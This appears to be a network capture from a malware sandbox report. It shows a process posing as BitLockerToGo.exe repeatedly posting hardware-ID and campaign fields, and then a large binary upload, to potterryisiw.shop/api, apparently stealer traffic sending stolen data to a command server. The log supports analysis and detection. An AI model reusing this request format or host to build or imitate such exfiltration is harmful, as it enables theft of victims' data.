                            2024-07-08 08:09:51 UTC283OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 13156
                            Host: potterryisiw.shop
                            2024-07-08 08:09:51 UTC13156OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 34 37 37 45 38 34 43 39 46 43 32 34 36 38 46 45 45 30 32 42 36 39 45 38 44 36 43 31 32 41 39 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 75 4f 4c 4d 62 2d 2d 70 61 6c 70 61
                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F477E84C9FC2468FEE02B69E8D6C12A9--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"fuOLMb--palpa
                            2024-07-08 08:09:51 UTC804INHTTP/1.1 200 OK
                            Date: Mon, 08 Jul 2024 08:09:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=59c1j35h6r3diier738qq8dvb9; expires=Fri, 01-Nov-2024 01:56:30 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xSPfnSC5850qwm5TguuHg9khDVJGNIqELv1VImJtn228sn9258IWoR5vNybNSIYeMiHFzH45UTz%2Fo2dsiXHIlSuiTd3hhHBLsW68w%2BSYjye%2B2BZjzE9VFc6ZeYmzEmBjySWmtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 89fe982fba914357-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-07-08 08:09:51 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                            Data Ascii: eok 8.46.123.33
                            2024-07-08 08:09:51 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            14192.168.2.1249739188.114.96.34438060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:52 UTC283OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 15076
                            Host: potterryisiw.shop
                            2024-07-08 08:09:52 UTC15076OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 34 37 37 45 38 34 43 39 46 43 32 34 36 38 46 45 45 30 32 42 36 39 45 38 44 36 43 31 32 41 39 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 75 4f 4c 4d 62 2d 2d 70 61 6c 70 61
                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F477E84C9FC2468FEE02B69E8D6C12A9--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"fuOLMb--palpa
                            2024-07-08 08:09:52 UTC802INHTTP/1.1 200 OK
                            Date: Mon, 08 Jul 2024 08:09:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=l78a0pq2gfgarp1n0nlt0rl8i6; expires=Fri, 01-Nov-2024 01:56:31 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jjJ9gETOjXjTnscHRExOH5vhk3mYAOD5VFmn8MArG5zltePhlm%2FZXGDSBsnwpYSbpMXt8%2BfjFcG0F0rmYuO6wZfuQmQSekagrwKCGllWTUQ9MIF6nQRpfUy2IalLBkQVJX249w%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 89fe9836de784277-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-07-08 08:09:52 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                            Data Ascii: eok 8.46.123.33
                            2024-07-08 08:09:52 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            15192.168.2.1249740188.114.96.34438060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:53 UTC283OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 20251
                            Host: potterryisiw.shop
                            2024-07-08 08:09:53 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 34 37 37 45 38 34 43 39 46 43 32 34 36 38 46 45 45 30 32 42 36 39 45 38 44 36 43 31 32 41 39 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 75 4f 4c 4d 62 2d 2d 70 61 6c 70 61
                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F477E84C9FC2468FEE02B69E8D6C12A9--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"fuOLMb--palpa
                            2024-07-08 08:09:53 UTC4920OUTData Raw: 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 46 a2 c3 62 df 0f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 6e 38 3a 2c f6 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 86 83 cf c7 92 c1 ab b1 e0 d5 e0 97 82 ff 63 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 bb 2f f9 58 bc 52 2d ce 14 cb 93 d3 d5 c2 54 a1 3c 75 7d 72 aa d2 28 d7 13 a3 c9 f1 0d 29 b5 c6 dc 07 c2 42 7b df 7e fd 0f 26 8f 27 ba d4 32 59 99 9e ac bd d2 c8 55 0b b5 e4 3d 23 51 c6 c5 3e 1c 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii: 0Fb}n8:,0c</XR-T<u}r()B{~&'2YU=#Q>|
                            2024-07-08 08:09:54 UTC804INHTTP/1.1 200 OK
                            Date: Mon, 08 Jul 2024 08:09:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=e4s33jqnncegui0i0urvljl2dc; expires=Fri, 01-Nov-2024 01:56:32 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BxmBn5aVSafWBEB7kQQlILForpwr2p4oVbdEME0m9uOP9RTINc5Lmx1RZ0kItvZ7PX6nAABoxdVrWMdjh6%2FxU0A8K2NfSDmaspSeY%2BYN4XAYOpk%2BFtWlo5FmwiPm4Rlk7YszwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 89fe983dec1242c9-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-07-08 08:09:54 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                            Data Ascii: eok 8.46.123.33
                            2024-07-08 08:09:54 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            16192.168.2.1249741188.114.96.34438060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:55 UTC282OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 1288
                            Host: potterryisiw.shop
                            2024-07-08 08:09:55 UTC1288OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 34 37 37 45 38 34 43 39 46 43 32 34 36 38 46 45 45 30 32 42 36 39 45 38 44 36 43 31 32 41 39 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 75 4f 4c 4d 62 2d 2d 70 61 6c 70 61
                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F477E84C9FC2468FEE02B69E8D6C12A9--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"fuOLMb--palpa
                            2024-07-08 08:09:55 UTC810INHTTP/1.1 200 OK
                            Date: Mon, 08 Jul 2024 08:09:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=q85iqror8dkrb7urh61eqdfd2u; expires=Fri, 01-Nov-2024 01:56:34 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vm4XUSSykeN%2BhiIPo1sepu3D6pnKa69%2F%2BnHXLowqq8hbHjMzS1khHMQxfkINFBAVPQou5x3Pr1tu5hAr7AMKFjKvKHPh4mrfojk8T7OHOiHUggBcOerx%2BygCMfFCJK0N4j%2B%2BDg%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 89fe98473e558c83-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-07-08 08:09:55 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                            Data Ascii: eok 8.46.123.33
                            2024-07-08 08:09:55 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            17192.168.2.1249742188.114.96.34438060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:56 UTC284OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 306028
                            Host: potterryisiw.shop
                            2024-07-08 08:09:56 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 34 37 37 45 38 34 43 39 46 43 32 34 36 38 46 45 45 30 32 42 36 39 45 38 44 36 43 31 32 41 39 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 75 4f 4c 4d 62 2d 2d 70 61 6c 70 61
                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F477E84C9FC2468FEE02B69E8D6C12A9--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"fuOLMb--palpa
                            2024-07-08 08:09:56 UTC15331OUTData Raw: cc 00 99 77 4e b5 c9 9b b6 88 bf bf d3 f6 ac d3 94 e5 a5 60 f6 b0 ec e9 ca 59 bf 57 84 37 ab 0e b9 3a 8f b7 a0 ba 3a 67 d2 52 a9 7b 0d c8 b0 fa 08 b4 07 02 33 43 1e 21 8e 37 69 80 3e e9 93 bd 3a 44 d8 3e 6f d0 95 83 69 c2 3f d2 4b 53 b7 5b 2b 5d c2 5d d7 1c f9 0a a3 8f ab 51 4e c9 a7 bd da 11 41 a7 37 05 87 9f 90 28 b6 05 eb fe c5 36 75 43 ab 8c 00 69 e6 95 4f 34 d0 93 d1 e0 79 e5 4d ab 1e d8 20 a6 0e 19 12 85 0a 8f f1 1d 16 a4 b6 f6 9a 9a fb 0c a9 61 9b b5 6a f0 96 ec 32 ae 11 59 60 4a 7e b0 cc 58 05 e0 06 f0 b1 0a a0 65 46 09 8a a1 9b e2 78 b2 3e 24 0a 46 27 1c 3f 3d 2d 09 51 12 3f 17 e7 0e d1 8e cb 9d d1 55 42 2c bf 6f c1 1d 68 71 51 23 97 6f 1d 0e 53 05 3f e1 74 33 f9 58 02 c6 95 85 59 7b ad 83 08 4a 61 9e 43 bb b9 68 72 52 51 4a 6f 51 00 a3 63 1e d0
                            Data Ascii: wN`YW7::gR{3C!7i>:D>oi?KS[+]]QNA7(6uCiO4yM aj2Y`J~XeFx>$F'?=-Q?UB,ohqQ#oS?t3XY{JaChrRQJoQc
                            2024-07-08 08:09:56 UTC15331OUTData Raw: e2 0a 40 e8 53 b2 d2 25 b5 a4 3c d1 7d ad 4b 07 54 a0 c5 95 be f1 47 e2 38 8f bd 1a 0e 02 97 26 c1 8b d0 b1 88 6f 20 18 bd 66 f0 7c 6f d0 fc 87 bd e3 c4 a0 ed db 63 98 48 36 9f 2f 69 0f 2e 12 4b e3 81 f4 f3 89 b2 9e 7f 49 94 95 6a 3c 58 fb 64 df e7 35 4b 63 eb ad 2a 8c a8 8f 60 52 50 e0 80 0b cd 30 cf 19 e8 b3 00 3b 76 27 38 92 37 75 60 7b 87 ec 3e 87 67 c6 c8 ca 06 76 af da 27 8f de 9f c2 ef 15 14 67 df fc bb 7e 31 87 e7 ef dc c8 94 d6 7f 16 57 1c e4 3c f0 0c a7 ca 1b e8 74 5f d1 db 8c 02 db 6b b5 1d 28 29 66 51 29 b5 ba d5 84 3a 28 05 70 5f e8 41 32 8a e1 d8 85 eb 12 34 95 32 89 97 a9 ad 15 b7 23 06 28 4a 3c ac 25 0f 81 42 cf af 6a 64 af 9a cd 99 86 ec 57 67 33 5b 73 01 9f 17 1b 6e d1 8f 08 51 56 af 83 46 7a cf c8 a1 ca 8f 96 47 2b 26 ac 88 76 fd bd 4c
                            Data Ascii: @S%<}KTG8&o f|ocH6/i.KIj<Xd5Kc*`RP0;v'87u`{>gv'g~1W<t_k()fQ):(p_A242#(J<%BjdWg3[snQVFzG+&vL
                            2024-07-08 08:09:56 UTC15331OUTData Raw: 55 4f 6f df e2 4d 6e 17 c7 fd c7 50 bf fd 79 0c 3a 79 23 11 f3 1c 18 82 e1 ba 1b db f6 19 d0 ac 58 ad e2 e4 2e 7a 5c 68 f6 1b c2 7a 97 e0 8b 0a d7 47 4e c7 d3 59 15 e4 e9 76 8e 2a 97 dd a5 3e 55 05 71 a8 06 7f 43 c0 8f 85 d7 91 3b 7a 23 cd 55 d3 97 4e 9e c2 da 2d b0 a2 fb 42 d9 a4 83 6f 31 5c cb 4c b6 15 ac 3d bc 5c 5c c7 83 6e d6 f1 a1 61 6f e3 e4 80 0f 3a 8f df 44 d1 a0 27 41 ed 02 33 23 c2 fb 8d 9b 39 d6 3c bf 17 19 70 42 a5 b9 f3 f5 7e ba de c0 fd bd 1f 3d ab 72 0d bd 2b 72 22 b3 b9 c3 4c 5b 0c 77 3e 40 69 51 27 32 5b a7 f3 a9 4a 1a 68 22 43 34 fa 63 63 e2 f6 4f 1e 2c 37 fe 35 fe ec a0 b1 43 4e 90 cd 1b 59 da 16 96 16 a4 33 9d 09 0c 34 60 3e de 7a 05 fb 7e 2d 5f ac 2f d6 9f 14 07 15 63 2e 79 06 ae fa 8f 0d 4c bf 9c f3 c3 aa 1d 5c e2 81 6f f8 06 81 c8
                            Data Ascii: UOoMnPy:y#X.z\hzGNYv*>UqC;z#UN-Bo1\L=\\nao:D'A3#9<pB~=r+r"L[w>@iQ'2[Jh"C4ccO,75CNY34`>z~-_/c.yL\o
                            2024-07-08 08:09:56 UTC15331OUTData Raw: 6c eb a2 84 18 f1 41 20 67 67 ee dc 96 60 be ee a2 f6 ac 15 15 92 6f b3 bb 21 88 df 6d d5 4c d4 7e e6 d1 5a 23 15 57 cf 70 46 4d 40 42 b4 bd 20 95 35 e8 65 0e 8b 0e 5f 32 98 92 77 ed 33 f9 74 f3 97 20 af a0 66 91 c9 98 5b cc 4f 4a a1 60 39 60 fa 2b 5c ca 2a bd 24 b5 e7 ae 94 f8 4c 9d d1 8e 76 86 05 3b 76 f2 79 4b 75 83 bd 89 e6 a9 91 c8 06 a0 ae ac c5 42 42 b4 6a a3 20 ea 6c 93 df bf 42 62 6e fc 98 fa 6a 39 98 fc 3c 0f 63 46 be da 7b 63 71 e1 80 32 1f 08 25 1c 6e 9a a1 5d e7 be b0 c4 ff 1a 58 7e 55 70 12 a4 69 51 86 0c 9b 5a 96 90 c4 90 8f ef 1a 66 04 14 93 b1 52 eb 39 ec c5 5f 87 32 91 47 a3 78 e2 a9 be 3c b1 79 ab a0 d6 bf 28 ff 0c f4 c4 d1 6f d0 2f 0d 22 44 57 df ae d8 97 14 80 60 8c ab 2b 7c 57 28 03 6f 23 70 af e3 cf 7a f4 cc 15 9c 9b 0f bd c6 ea 91
                            Data Ascii: lA gg`o!mL~Z#WpFM@B 5e_2w3t f[OJ`9`+\*$Lv;vyKuBBj lBbnj9<cF{cq2%n]X~UpiQZfR9_2Gx<y(o/"DW`+|W(o#pz
                            2024-07-08 08:09:56 UTC15331OUTData Raw: bf 12 4f 1e fc 18 c5 2b 90 05 7e 1e 2f 0d 38 42 63 36 26 6e 8e d3 43 6a c0 3c 00 16 57 44 92 61 08 92 36 d4 94 49 d9 fa 12 2e 0e 51 55 a5 1a df 15 23 b4 6d b8 64 dd aa 4d 95 23 5a ed 9d 29 61 54 db 53 6f a4 f4 a4 2a b9 46 29 54 4a b3 ce a8 df f7 68 39 0a 56 2d 1c 21 8c 10 9e 89 ab 65 6e 36 58 30 10 4c 0c 07 86 9f 74 be 2d 40 d3 6d 77 ce 74 63 78 a3 94 b8 0c a3 bb 84 f1 23 4b 65 3a 16 9d e1 c9 c5 1e b9 06 ba 7b 69 e4 1e 8e 66 18 99 21 b0 38 67 a2 08 84 6e 3f 2d e6 90 4f 61 29 f7 30 42 6a dc 7d 35 93 1b 17 a6 02 44 0d bb cf e7 1a 74 9f 87 24 be 45 76 06 df f1 84 72 3e df f6 31 5e d1 07 9b 10 fb d9 ac f0 e7 d7 7c 8d 0f 6a e2 60 f4 82 10 5e fc 4a 95 c4 ea c1 83 17 91 03 48 bb 95 2a 9a f6 37 da e6 9a dd 8a 02 2d e1 c5 41 fc c4 8b 9f c4 7f ca e4 c7 a3 af f7 ba
                            Data Ascii: O+~/8Bc6&nCj<WDa6I.QU#mdM#Z)aTSo*F)TJh9V-!en6X0Lt-@mwtcx#Ke:{if!8gn?-Oa)0Bj}5Dt$Evr>1^|j`^JH*7-A
                            2024-07-08 08:09:56 UTC15331OUTData Raw: d6 7e 54 6e b4 1e 0a f6 54 23 3b 08 da 7c 82 7c 47 f8 40 bf c7 2f 21 03 35 a7 62 e7 99 95 a8 e6 c4 f6 ea 17 4f 7e f2 4f b4 ec e0 ab e0 e4 de 0f a1 cd cc a2 0e e9 6b 76 bf 6e bf 98 2d 82 f5 99 8d 3c b1 e6 8c a9 92 99 98 bb 56 45 9c 10 44 8b 0c 64 86 d4 ac b7 ce e3 c5 14 c6 21 02 27 a8 fe 69 85 ad 68 b7 53 cd 36 79 b2 b8 b4 87 8f c3 e4 4c 79 ee a8 46 25 c7 0c 24 3d 78 bf e4 95 f5 dd 59 8c 3c 5b ff a0 5a 1c 11 88 70 f7 4f 88 d9 a7 8e 98 c9 ab 30 15 b5 3e fa 2b dc 94 10 8e 27 83 19 ae 86 82 05 61 cd 62 b4 72 b8 c5 e1 34 cc 6f f0 64 9b 28 4c f4 8a a8 a7 3b 47 e0 cd e5 f3 66 cc 31 cb ab d8 02 8a 20 28 e0 33 10 96 7e 1c 7c de d9 a9 2c 41 fc a8 43 3f 27 cf 11 8d 68 83 2b 4e aa fa b7 86 2a ee d0 4a a0 d5 3f a2 b0 2d a7 51 3b f4 00 76 01 7b 0d 7b d1 d0 66 e3 ac 78
                            Data Ascii: ~TnT#;||G@/!5bO~Okvn-<VEDd!'ihS6yLyF%$=xY<[ZpO0>+'abr4od(L;Gf1 (3~|,AC?'h+N*J?-Q;v{{fx
                            2024-07-08 08:09:56 UTC15331OUTData Raw: ff df 37 25 94 e9 a2 d9 7d b8 1f bc 7c af fc bb 4b d6 92 09 bf 16 59 11 f8 e1 7b db 94 4d 25 fb dd c0 fa 93 a3 23 53 49 62 90 64 f0 4b 25 d9 ff a3 a3 de 88 9c 58 db ac 71 8f 0a f9 e3 e2 a7 c8 ca 89 57 e6 6a 2b 57 0b d9 5f 8e a2 5a 96 ce 61 c0 9b 50 aa eb f9 24 34 a5 a2 be 81 a7 e1 85 8d be db e5 3a ff e0 aa d5 a3 7a d6 d5 fe 57 b2 9f 95 37 57 e8 fd 76 fe 59 9e 59 f9 67 83 51 bc 77 76 5e 6e c5 5a 14 ae d6 e5 1c 6d c8 28 26 9a 23 cb bb 50 6b 18 35 3c 6d 6e 06 d5 61 d5 61 fa fd 1b 69 2f d8 e5 ce 65 c6 51 2a 46 78 62 24 60 44 6a 69 10 69 7c c8 bf 7b f7 72 a2 f6 84 d0 e8 2f c0 e0 ae ae 95 e1 5e 3e 34 7d 93 b0 36 2d bc cc bd bd 0f 5b 9a 13 bb a8 78 ea 83 c2 32 03 98 4e 5c 73 45 9d 4f c8 85 a7 3c 45 c0 4a bc 37 27 9e be b2 af 32 46 e0 3b f5 81 f7 c3 47 f1 0b e6
                            Data Ascii: 7%}|KY{M%#SIbdK%XqWj+W_ZaP$4:zW7WvYYgQwv^nZm(&#Pk5<mnaai/eQ*Fxb$`Djii|{r/^>4}6-[x2N\sEO<EJ7'2F;G
                            2024-07-08 08:09:56 UTC15331OUTData Raw: 32 e0 7b 0f cf 11 db 49 2f ed d8 85 77 18 89 28 73 52 1c b5 d5 09 28 87 0c 9e 81 96 3a e0 a5 fb be 8c c5 b5 60 d7 8f ee 26 94 e2 3a cd d3 e3 22 d0 b1 3c f2 21 5b e2 d8 30 0b 42 46 27 01 71 ad b2 24 b4 05 7a 81 f9 22 91 ef e5 97 90 db f9 5f 66 37 95 50 12 7a 32 08 cd 6f d9 3b a7 3d 6e c7 8a ae af 1f 51 64 65 cc ea 27 b6 93 a5 22 ce c0 33 24 3e e4 9c 7c d1 41 d2 15 2a 9d 56 93 b1 ba 75 26 ee c5 db 20 f5 d8 9f de 35 1c da e8 b1 b4 17 ad 1f b4 57 d3 64 b7 6c 20 e8 4c 77 99 fc e5 37 77 e0 c3 5e e7 31 57 62 ff d5 81 f2 7f 48 82 f8 9a 2d 2d 61 e2 49 78 b6 ca f8 e9 2c e4 1e 92 87 29 ce b7 57 d9 55 b2 f6 48 56 34 86 f3 a7 f2 35 d7 35 85 9f 5c 42 f7 a5 ef c0 d2 76 c9 33 27 f5 24 ea e7 ad 14 fa c2 b8 75 af 44 5b df d9 5e c7 5e 1f 52 b6 e1 bc b2 db bf bf d6 ea dc 8c
                            Data Ascii: 2{I/w(sR(:`&:"<![0BF'q$z"_f7Pz2o;=nQde'"3$>|A*Vu& 5Wdl Lw7w^1WbH--aIx,)WUHV455\Bv3'$uD[^^R
